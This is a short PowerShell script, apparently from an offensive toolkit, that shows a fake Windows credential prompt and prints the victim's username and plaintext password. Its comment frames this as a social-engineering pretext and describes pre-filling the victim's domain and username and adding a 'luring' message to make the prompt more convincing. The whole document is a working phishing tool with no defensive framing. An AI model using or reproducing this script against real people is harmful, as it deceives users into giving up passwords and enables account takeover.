<# try { (Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression = { If ($_.Domain -ne [string]::Empty) { "{0}\{1}" -f ($_.Domain), ($_.UserName) } Else { $_.UserName } } }, Password | Format-List } catch { } One can additionally add, right after Get-Credential following parameters that could improve pretext's quality during social engineering attempt: -Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog -Message "Some luring sentence" - to include some luring message #> try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }